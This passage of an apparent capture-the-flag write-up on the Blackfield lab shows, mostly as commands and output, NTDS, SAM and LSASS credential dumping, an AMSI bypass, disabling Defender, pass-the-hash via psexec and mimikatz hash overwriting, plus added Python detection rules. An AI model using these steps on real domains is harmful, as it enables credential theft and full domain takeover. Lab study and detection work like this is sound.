jamarir@kali:~$ nxc ldap 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' -d 'BLACKFIELD.local' --query "(&(memberOf=CN=Remote Management Users,CN=Builtin,DC=BLACKFIELD,DC=LOCAL))" "distinguishedName"
[...]
LDAP 10.10.10.192 389 DC01 distinguishedName: CN=svc_backup,CN=Users,DC=BLACKFIELD,DC=local
Actually, Microsoft's "Configure Remote Management in Server Manager" article states that local administrators may not have access to WinRM. However, this is NOT applicable to the builtin Administrator, who can always access WinRM.
ntdsutil.exe / DSInternals extraction method (NTDS + SYSTEM) (requires admin !)
Another method to extract the NTDS's secrets is to use the Get-ADDBAccount.ps1 script, from the DSInternals suite. This method requires a media set, called the IFM (Installation Full Media). This media is used, for example, to copy the NTDS database over the network to newly installed DCs, even if the NTDS is currently in use.
The procedure is:
- Just in case an AMSI memory malware scanner is enabled in the WinRM process, bypass it:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Bypass-4MSI
- Upload the DSInternals archive to the target and unzip it:
jamarir@kali:~$ ls
DSInternals_v4.14.zip
jamarir@kali:~$ smbserver.py share . -smb2support
*Evil-WinRM* PS C:\Users\Administrator\Documents> cp \\10.10.14.20\share\DSInternals_v4.14.zip .
*Evil-WinRM* PS C:\Users\Administrator\Documents> Expand-Archive DSInternals_v4.14.zip DSInternals
- Import the DSInternals PowerShell modules:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Import-Module ./DSInternals/DSInternals/DSInternals.psd1 -Force
*Evil-WinRM* PS C:\Users\Administrator\Documents> gcm Get-ADDB*
CommandType Name Version Source
----------- ---- ------- ------
Alias Get-ADDBGroupManagedServiceAccount 4.14 DSInternals
Cmdlet Get-ADDBAccount 4.14 DSInternals
Cmdlet Get-ADDBBackupKey 4.14 DSInternals
Cmdlet Get-ADDBDomainController 4.14 DSInternals
Cmdlet Get-ADDBKdsRootKey 4.14 DSInternals
Cmdlet Get-ADDBSchemaAttribute 4.14 DSInternals
Cmdlet Get-ADDBServiceAccount 4.14 DSInternals
- Shadow-copy the NTDS and SYSTEM files using ntdsutil.exe:
*Evil-WinRM* PS C:\Users\Administrator\Documents> ntdsutil.exe "activate instance ntds" "ifm" "create SYSVOL full C:\Windows\Tasks\NTDS" quit quit
C:\Windows\system32\ntdsutil.exe: activate instance ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create SYSVOL full C:\Windows\Tasks\NTDS
Creating snapshot...
Snapshot set {de4afe4e-89b6-44aa-a99a-b0bd4fa81dfe} generated successfully.
Snapshot {e337fe93-ef60-4e75-b65b-869cee06de0b} mounted as C:\$SNAP_<DATE>_VOLUMEC$\
Snapshot {e337fe93-ef60-4e75-b65b-869cee06de0b} is already mounted.
Snapshot {e337fe93-ef60-4e75-b65b-869cee06de0b} is already mounted.
Initiating DEFRAGMENTATION mode...
Source Database: C:\$SNAP_<DATE>_VOLUMEC$\Windows\NTDS\ntds.dit
Target Database: C:\Windows\Tasks\NTDS\Active Directory\ntds.dit
Defragmentation Status (omplete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
Copying C:\Windows\Tasks\NTDS\registry\SYSTEM
Copying C:\Windows\Tasks\NTDS\registry\SECURITY
Copying SYSVOL...
[...]
Snapshot {e337fe93-ef60-4e75-b65b-869cee06de0b} unmounted.
IFM media created successfully in C:\Windows\Tasks\NTDS
ifm: quit
C:\Windows\system32\ntdsutil.exe: quit
- Extract NTHashes using the Get-ADDBAccount cmdlet:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADDBAccount -All -DBPath 'C:\Windows\Tasks\NTDS\Active Directory\ntds.dit' -BootKey (Get-BootKey -SystemHivePath 'C:\Windows\Tasks\NTDS\registry\SYSTEM')
[Very long output crashing WinRM !]
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADDBAccount -DistinguishedName 'CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local' -DBPath 'C:\Windows\Tasks\NTDS\Active Directory\ntds.dit' -BootKey (Get-BootKey -SystemHivePath 'C:\Windows\Tasks\NTDS\registry\SYSTEM')
DistinguishedName: CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local
Sid: S-1-5-21-4194615774-2175524697-3563712290-500
Guid: 2118ae1a-b338-4308-9901-bb763a7c0e5b
SamAccountName: Administrator
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: True
UserAccountControl: NormalAccount, PasswordNeverExpires
SupportedEncryptionTypes: Default
AdminCount: True
Deleted: False
LastLogonDate: <DATE>
DisplayName:
GivenName:
Surname:
Description: Built-in account for administering the computer/domain
ServicePrincipalName:
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited, DiscretionaryAclProtected, SelfRelative
Owner: S-1-5-21-4194615774-2175524697-3563712290-512
Secrets
NTHash: 184fb5e5178480be64824d4cd53b99ee
LMHash:
NTHashHistory:
Hash 01: 184fb5e5178480be64824d4cd53b99ee
Hash 02: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Hash 03: ac2983b6afa7bdea9360fa7a95e31855
Hash 04: a47feb765cf90d3216423e9cfedea565
Hash 05: 24958cffdd2aa3125c63c3fd374db44b
LMHashHistory:
Hash 01: 9f5d55ddfdef1ad96c83f770bed89df3
Hash 02: b795d74a5f0181fd412a76c1600c8bfb
Hash 03: 885326d4dee15df39276657a555fb362
Hash 04: 226816c11a2502b73182332a62ff325f
SupplementalCredentials:
ClearText:
NTLMStrongHash: d3880175259bd17683f008ffe8312511
[...]
PsExec isn’t possible ? :(
NTDS vs Defender
Here’s a recap of the Administrator’s NTHash we dumped from the NTDS:
*Evil-WinRM* PS C:\windows\tasks> $alias="foo"; "set context persistent nowriters`r`nadd volume c: alias $alias`r`ncreate`r`nexpose %$alias% x:" |Out-File -Encoding ascii -nonewline "$alias.dsh"
*Evil-WinRM* PS C:\windows\tasks> diskshadow.exe /s "$alias.dsh"
*Evil-WinRM* PS C:\windows\tasks> robocopy /b x:\windows\ntds . ntds.dit
*Evil-WinRM* PS C:\windows\tasks> robocopy /b x:\windows\system32\config . system
jamarir@kali:~$ secretsdump.py -ntds ntds.dit -system SYSTEM local
[...]
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
*Evil-WinRM* PS C:\Users\Administrator\Documents> Import-Module ./DSInternals/DSInternals/DSInternals.psd1 -Force
*Evil-WinRM* PS C:\Users\Administrator\Documents> ntdsutil.exe "activate instance ntds" "ifm" "create SYSVOL full C:\Windows\Tasks\NTDS" quit quit
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADDBAccount -DistinguishedName 'CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local' -DBPath 'C:\Windows\Tasks\NTDS\Active Directory\ntds.dit' -BootKey (Get-BootKey -SystemHivePath 'C:\Windows\Tasks\NTDS\registry\SYSTEM')
[...]
Secrets
NTHash: 184fb5e5178480be64824d4cd53b99ee
LMHash:
NTHashHistory:
Hash 01: 184fb5e5178480be64824d4cd53b99ee
Hash 02: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
[...]
LMHashHistory:
Hash 01: 9f5d55ddfdef1ad96c83f770bed89df3
Hash 02: b795d74a5f0181fd412a76c1600c8bfb
[...]
Even if we have access to the ADMIN$ share:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\Administrator:184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.192 445 DC01 C$ READ,WRITE Default share
[...]
We can’t PsExec using that valid Administrator’s NTHash. Setting the debug option shows:
jamarir@kali:~$ psexec.py -hashes ':184fb5e5178480be64824d4cd53b99ee' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192' -debug
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /home/jamarir/.venv/lib/python3.12/site-packages/impacket
[+] StringBinding ncacn_np:10.10.10.192[\pipe\svcctl]
[*] Requesting shares on 10.10.10.192.....
[*] Found writable share ADMIN$
[*] Uploading file UKuogZlp.exe
[*] Opening SVCManager on 10.10.10.192.....
[*] Creating service yXDy on 10.10.10.192.....
[*] Starting service yXDy.....
[Execution flow blocked for some time...]
Traceback (most recent call last):
File "/home/jamarir/.venv/bin/psexec.py", line 165, in doStuff
fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/jamarir/.venv/bin/psexec.py", line 115, in openPipe
raise Exception('Pipe not ready, aborting')
Exception: Pipe not ready, aborting
[+] Pipe not ready, aborting
[*] Opening SVCManager on 10.10.10.192.....
[-] Error performing the uninstallation, cleaning up
Indeed, when looking at the content of the ADMIN$ share (C:\Windows\) before, during, and after PsExec, we see that an uploaded file is deleted:
*Evil-WinRM* PS C:\windows\tasks> Get-ChildItem |Sort-Object -Property LastWriteTime
[...]
-a---- <DATE> 9:05 PM 52790 admin$_pre_psexec.txt
-a---- <DATE> 9:06 PM 53292 admin$_while1_psexec.txt
-a---- <DATE> 9:06 PM 52790 admin$_while2_psexec.txt
-a---- <DATE> 9:07 PM 52790 admin$_post_psexec.txt
The ADMIN$ listing's size dropping from 53292 to 52790 bytes happens some seconds after the [*] Starting service yXDy..... message. Comparing the two listings shows that it's actually the uploaded UKuogZlp.exe file that gets deleted:
*Evil-WinRM* PS C:\windows\tasks> Compare-Object (Get-Content 'admin$_while1_psexec.txt') (Get-Content 'admin$_while2_psexec.txt')
[...]
-a---- <DATE> 9:05 PM 56320 UKuogZlp.exe
To check further, I enabled the SMB features in my Windows 11 VM (you can momentarily disable Windows Defender), and PsExec'ed on my VM:
PS C:\Users\jamarir> mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
jamarir@kali:~$ psexec.py -hashes ':<NTHash>' './jamarir@192.168.56.4' -remote-binary-name BLACKFIELD.exe
Once the PsExec binary is uploaded, a Defender notification popped up:
Bypassing the antivirus is out of scope for this CTF, but at least the PsExec failure is understandable, and PsExec does work once Defender is disabled :)
*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-MpPreference -DisableRealtimeMonitoring $true
jamarir@kali:~$ psexec.py -hashes ':184fb5e5178480be64824d4cd53b99ee' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192'
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.192.....
[*] Found writable share ADMIN$
[*] Uploading file fMoiOKYo.exe
[*] Opening SVCManager on 10.10.10.192.....
[*] Creating service ChCQ on 10.10.10.192.....
[*] Starting service ChCQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
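Every step in the Secretsdumping section above (reg.exe save of the SAM/SYSTEM hives, a scripted diskshadow run, robocopy /b against the shadow volume, ntdsutil ifm creation) and the PsExec attempt in this section leaves an artefact a defender can alert on: a process-creation event with a telling command line, or a service-install event whose service name and binary look like what psexec.py generates (yXDy / UKuogZlp.exe and ChCQ / fMoiOKYo.exe above). The following is an added example that is not part of the original write-up: a small rule set run over constructed event records. The field names are this example's own convention (loosely modelled on Security 4688 and System 7045 records) and the values are made up to mirror the commands seen in this write-up.

```python
"""Detection rules for hive export, shadow-copy secrets extraction, NTDS IFM
creation and PsExec-style service installs.

Added example, not part of the original write-up. The events below are
constructed to look like Security 4688 (process creation) and System 7045
(service install) records; field names are this example's own convention.
"""
import re

SAMPLE_EVENTS = [
    {"id": 4688, "user": r"BLACKFIELD\svc_backup",
     "cmdline": r"reg save hklm\sam C:\windows\tasks\sam.hive"},
    {"id": 4688, "user": r"BLACKFIELD\svc_backup",
     "cmdline": r"diskshadow.exe /s foo.dsh"},
    {"id": 4688, "user": r"BLACKFIELD\svc_backup",
     "cmdline": r"robocopy /b x:\windows\ntds . ntds.dit"},
    {"id": 4688, "user": r"BLACKFIELD\Administrator",
     "cmdline": r'ntdsutil.exe "activate instance ntds" "ifm" "create SYSVOL full C:\Windows\Tasks\NTDS" quit quit'},
    {"id": 7045, "service": "yXDy", "image": r"%SystemRoot%\UKuogZlp.exe", "account": "LocalSystem"},
    {"id": 7045, "service": "Sysmon64", "image": r"C:\Windows\Sysmon64.exe", "account": "LocalSystem"},
    {"id": 4688, "user": r"BLACKFIELD\jdoe",                       # benign: should not alert
     "cmdline": r"reg query hklm\software\microsoft\windows\currentversion"},
]

# Command-line rules applied to process-creation events.
CMDLINE_RULES = [
    ("hive_export_reg_save",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b", re.I)),
    ("scripted_shadow_copy",
     re.compile(r"\bdiskshadow(?:\.exe)?\s+/s\b", re.I)),
    ("backup_mode_copy_of_secrets",
     re.compile(r"\brobocopy(?:\.exe)?\s+/b\b.*(?:\\ntds\b|system32\\config)", re.I)),
    ("ntds_ifm_media_creation",
     re.compile(r"\bntdsutil(?:\.exe)?\b.*\bifm\b.*\bcreate\b", re.I)),
]

# psexec.py pattern seen in the write-up: a 4-letter service name whose binary
# is an 8-letter .exe dropped in the root of ADMIN$ (C:\Windows).
PSEXEC_SERVICE = re.compile(r"^[A-Za-z]{4}$")
PSEXEC_IMAGE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.I)


def evaluate(events):
    """Return (rule, event_index, subject) for every event that trips a rule."""
    alerts = []
    for i, ev in enumerate(events):
        if ev["id"] == 4688:
            for name, rx in CMDLINE_RULES:
                if rx.search(ev["cmdline"]):
                    alerts.append((name, i, ev["user"]))
        elif ev["id"] == 7045:
            if PSEXEC_SERVICE.match(ev["service"]) and PSEXEC_IMAGE.match(ev["image"]):
                alerts.append(("psexec_like_service_install", i, ev["service"]))
    return alerts


if __name__ == "__main__":
    for rule, idx, subject in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} ({subject})")
```

The name heuristic for the service install is deliberately narrow and therefore brittle (the write-up itself renames the binary with -remote-binary-name), so in practice it belongs alongside the ADMIN$ file-write event and the fact that a brand-new service runs as LocalSystem from a binary that was not there a minute earlier; the command-line rules, by contrast, key on arguments the tools need and are hard to avoid.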
LSASS vs History
The Administrator's NTHash from the local LSASS is:
jamarir@kali:~$ pypykatz lsa minidump lsass.DMP |grep -vP '^[\S]+\s*|\s+?.*? ?(None|\(hex\)|:\s*)$'
PS C:\Users\jamarir> mimikatz.exe "sekurlsa::minidump lsass.DMP" "sekurlsa::logonpasswords" "exit" |Select-String -NotMatch '^.*\(null\)|^\s*\w+\s+:\s*$'
[...]
Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23/02/2020 18:59:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
However, the LSASS’s NTHash isn’t allowed against SMB, thus over PsExec:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '7f1e4ff8c6a8e6b6fcae2d9c0572cd62' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE
jamarir@kali:~$ psexec.py -hashes ':7f1e4ff8c6a8e6b6fcae2d9c0572cd62' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192'
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.
That's because this is an old password-history hash, as shown in the NTDS outputs from Get-ADDBAccount or secretsdump.py -history, or in the following Get-ADReplAccount output (which requires replication privileges on the DC):
*Evil-WinRM* PS C:\windows\tasks> Get-ADReplAccount -SamAccountName Administrator -Server 'DC01.BLACKFIELD.local'
[...]
Secrets
NTHash: 184fb5e5178480be64824d4cd53b99ee
LMHash:
NTHashHistory:
Hash 01: 184fb5e5178480be64824d4cd53b99ee
Hash 02: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Hash 03: ac2983b6afa7bdea9360fa7a95e31855
Hash 04: a47feb765cf90d3216423e9cfedea565
Hash 05: 24958cffdd2aa3125c63c3fd374db44b
LMHashHistory:
Hash 01: 9f5d55ddfdef1ad96c83f770bed89df3
Hash 02: b795d74a5f0181fd412a76c1600c8bfb
Hash 03: 885326d4dee15df39276657a555fb362
Hash 04: 226816c11a2502b73182332a62ff325f
This password history is used, in particular, to prevent users from reusing old passwords.
SAM vs ¯\_(ツ)_/¯
The Administrator’s NTHash from the local SAM is:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\sam sam.hive
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system.hive
*Evil-WinRM* PS C:\Users\svc_backup\Documents> ./mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" exit
jamarir@kali:~$ pypykatz registry --sam sam.hive system.hive
jamarir@kali:~$ secretsdump.py -sam sam.hive -system system.hive LOCAL
[...]
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
And again, we can’t access SMB, or PsExec, or WmiExec:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '67ef902eae0d740df6257f273de75051' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Administrator:67ef902eae0d740df6257f273de75051 STATUS_LOGON_FAILURE
jamarir@kali:~$ psexec.py -hashes ':67ef902eae0d740df6257f273de75051' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192'
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.
jamarir@kali:~$ wmiexec.py -hashes ':67ef902eae0d740df6257f273de75051' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192'
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.
I thought it was a UAC policy issue, which unfortunately it wasn't:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'FilterAdministratorToken'
FilterAdministratorToken : 1
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies
PSChildName : System
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'FilterAdministratorToken' -Value 0
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '67ef902eae0d740df6257f273de75051' --shares --local-auth
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:DC01) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] DC01\Administrator:67ef902eae0d740df6257f273de75051 STATUS_LOGON_FAILURE
But, when I force the Administrator’s NTHash update in the SAM database with Mimikatz, it magically works:
*Evil-WinRM* PS C:\Users\Administrator\Documents> ./mimikatz.exe "lsadump::setntlm /user:Administrator /ntlm:67ef902eae0d740df6257f273de75051" exit
[...]
mimikatz(commandline) # lsadump::setntlm /user:Administrator /ntlm:67ef902eae0d740df6257f273de75051
NTLM : 67ef902eae0d740df6257f273de75051
Target server:
Target user : Administrator
Domain name : BLACKFIELD
Domain SID : S-1-5-21-4194615774-2175524697-3563712290
User RID : 500
>> Informations are in the target SAM!
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '67ef902eae0d740df6257f273de75051' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\Administrator:67ef902eae0d740df6257f273de75051 (Pwn3d!)
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.192 445 DC01 C$ READ,WRITE Default share
SMB 10.10.10.192 445 DC01 forensic READ,WRITE Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ,WRITE Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ,WRITE Logon server share
Because it actually overwrote the NTDS’s NTHash (used for domain-based authentications)…
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADDBAccount -DistinguishedName 'CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local' -DBPath 'C:\Windows\Tasks\NTDS\Active Directory\ntds.dit' -BootKey (Get-BootKey -SystemHivePath 'C:\Windows\Tasks\NTDS\registry\SYSTEM')
DistinguishedName: CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local
Sid: S-1-5-21-4194615774-2175524697-3563712290-500
Guid: 2118ae1a-b338-4308-9901-bb763a7c0e5b
SamAccountName: Administrator
SamAccountType: User
[...]
Owner: S-1-5-21-4194615774-2175524697-3563712290-512
Secrets
NTHash: 67ef902eae0d740df6257f273de75051
LMHash:
NTHashHistory:
Hash 01: 67ef902eae0d740df6257f273de75051
Hash 02: 184fb5e5178480be64824d4cd53b99ee
Hash 03: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
[...]
Is local authentication disabled on the DC ? Or is it not disabled over the network ?
¯\_(ツ)_/¯